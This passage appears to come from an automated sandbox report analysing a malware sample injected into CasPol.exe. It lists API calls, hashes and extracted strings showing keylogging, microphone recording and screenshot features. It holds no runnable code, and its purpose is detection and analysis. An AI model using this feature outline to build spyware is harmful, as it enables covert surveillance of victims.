                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                                                                                                                              • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                                                                                              • Opcode Fuzzy Hash: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                                                                                                                              • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                                                                                                                              • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                                                                                              • Opcode Fuzzy Hash: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                                                                                                                              • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                                                                                              APIs
                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                                                                                • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                                                                                • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 737400349-0
                                                                                                                                                              • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                              • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                                                                              • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                              • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                                                                              • GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                              • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                              • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                                                                              • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                              • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                              • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                              • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                              • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                              • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                                                                                              • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                                                                                              • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4116985748-0
                                                                                                                                                              • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                                                                              • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                                                                                              • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                                                                              • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                                                                                              APIs
                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                                                              • String ID: pow
                                                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                                                              • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                                                              • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                                                                                                              • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                                                              • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                                                                                                              APIs
                                                                                                                                                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Info
                                                                                                                                                              • String ID: $fD
                                                                                                                                                              • API String ID: 1807457897-3092946448
                                                                                                                                                              • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                                                                              • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                                                                              • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                                                                              • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                                                                              APIs
                                                                                                                                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
                                                                                                                                                                • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                                                              • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
                                                                                                                                                                • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                                                                                                • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                              • String ID: image/jpeg
                                                                                                                                                              • API String ID: 1291196975-3785015651
                                                                                                                                                              • Opcode ID: e815ce1b6b5f94e363a1fc2ff1c8119a4cd834232fd605746a95e2bb31494ea3
                                                                                                                                                              • Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
                                                                                                                                                              • Opcode Fuzzy Hash: e815ce1b6b5f94e363a1fc2ff1c8119a4cd834232fd605746a95e2bb31494ea3
                                                                                                                                                              • Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                                                                                                                              APIs
                                                                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509B9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                              • API String ID: 0-711371036
                                                                                                                                                              • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                              • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                                                                              • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                              • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                                                                              APIs
                                                                                                                                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                                                                                                                                                • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                                                                                              • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                                                                                                                                                • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                                                                                                • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                              • String ID: image/png
                                                                                                                                                              • API String ID: 1291196975-2966254431
                                                                                                                                                              • Opcode ID: 237698dc32514766c1fad297d1dce59c0e96963289857c2210f17381393a4e10
                                                                                                                                                              • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                                                                                                                                                              • Opcode Fuzzy Hash: 237698dc32514766c1fad297d1dce59c0e96963289857c2210f17381393a4e10
                                                                                                                                                              • Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6
                                                                                                                                                              APIs
                                                                                                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                                                              Strings
                                                                                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LocalTime
                                                                                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                              • API String ID: 481472006-1507639952
                                                                                                                                                              • Opcode ID: ef17581a39fbd391229547539f15d99c33dd27b8bec5d6813d4c4f21374c3312
                                                                                                                                                              • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                                                                              • Opcode Fuzzy Hash: ef17581a39fbd391229547539f15d99c33dd27b8bec5d6813d4c4f21374c3312
                                                                                                                                                              • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _strlen
                                                                                                                                                              • String ID: : $Se.
                                                                                                                                                              • API String ID: 4218353326-4089948878
                                                                                                                                                              • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                              • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                              • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                              • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                              APIs
                                                                                                                                                              • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LocalTime
                                                                                                                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                              • API String ID: 481472006-2430845779
                                                                                                                                                              • Opcode ID: 298a8fa4a0a4a1ca75070d71eab88c5053a9fb91c71f84409335018714d5b4ac
                                                                                                                                                              • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                                                                                              • Opcode Fuzzy Hash: 298a8fa4a0a4a1ca75070d71eab88c5053a9fb91c71f84409335018714d5b4ac
                                                                                                                                                              • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                                                              APIs
                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                              • String ID: alarm.wav$xIG
                                                                                                                                                              • API String ID: 1174141254-4080756945
                                                                                                                                                              • Opcode ID: 0a76431ab4a88effeebceef92ad2fcb8722f1f98700180dc5c6588446cfe7835
                                                                                                                                                              • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                                                                                              • Opcode Fuzzy Hash: 0a76431ab4a88effeebceef92ad2fcb8722f1f98700180dc5c6588446cfe7835
                                                                                                                                                              • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                                                              • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                              • String ID: Online Keylogger Stopped
                                                                                                                                                              • API String ID: 1623830855-1496645233
                                                                                                                                                              • Opcode ID: 4e19c90638ad7668d8382ed65e6b3a2ca1ac7df57cc043217804cdfd39f05b44
                                                                                                                                                              • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                                                                                              • Opcode Fuzzy Hash: 4e19c90638ad7668d8382ed65e6b3a2ca1ac7df57cc043217804cdfd39f05b44
                                                                                                                                                              • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                              • API String ID: 3476068407-410509341
                                                                                                                                                              • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                              • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                              • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                              • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                                                              APIs
                                                                                                                                                              • waveInPrepareHeader.WINMM(00635D90,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                                                                                              • waveInAddBuffer.WINMM(00635D90,00000020,?,00000000,00401913), ref: 0040175D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wave$BufferHeaderPrepare
                                                                                                                                                              • String ID: T=G
                                                                                                                                                              • API String ID: 2315374483-379896819
                                                                                                                                                              • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                                                                              • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                                                                                              • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                                                                                              • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                                                                                              APIs
                                                                                                                                                              • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
